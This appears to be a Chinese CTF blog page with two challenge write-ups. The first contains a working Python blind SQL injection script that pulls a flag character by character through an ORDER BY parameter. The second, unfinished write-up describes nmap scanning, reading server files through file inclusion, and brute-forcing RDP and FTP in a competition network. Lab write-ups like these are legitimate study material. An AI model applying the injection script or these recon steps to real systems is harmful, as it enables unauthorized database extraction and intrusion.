周周练
发表于
WEB
简单order注入
- 提示是order注入,网上查了资料,学习了一波,源码里提示: select flag from flag,省去爆表名列名了,直接爆数据
- 盲注脚本:
1
2
3
4
5
6
7
8
9
10
11
12import requests
flag = ''
url = 'http://101.71.29.5:10001/?order=(select+1+regexp+if(ord(substring((select+flag+from+flag+limit+0,1),{},1))={},1,0x00))%23&button=submit'
for i in range(24,28):
for j in range(32,127):
u = url.format(i,j)
#print(u)
if ('fangzhang' not in requests.get(u).text):
flag += chr(j)
print(flag)
break
print(flag)签到题不会,呜呜呜
铁人三项第七赛区企业赛wp
发表于
|
分类于
渗透
首先给了ip段,202.1.8.50-60
我们能用nmap扫到的是50,52,60
202.1.8.50开放了web服务,ftp服务,还开了3389
版本是windows sever2003 sp2
先访问80端口,撸猫大战- -
源代码里给的提示是Tips.php
刚看完队友已经文件包含读到Tips.php的源码,
1 | 内容是:Have you ever heard of SNMP informaiton treasure? |
猜测应该是和snmp服务有关。
还读到了flag.php,成功拿到第一个flag!
之后思路错了,开始爆3389和ftp,无果。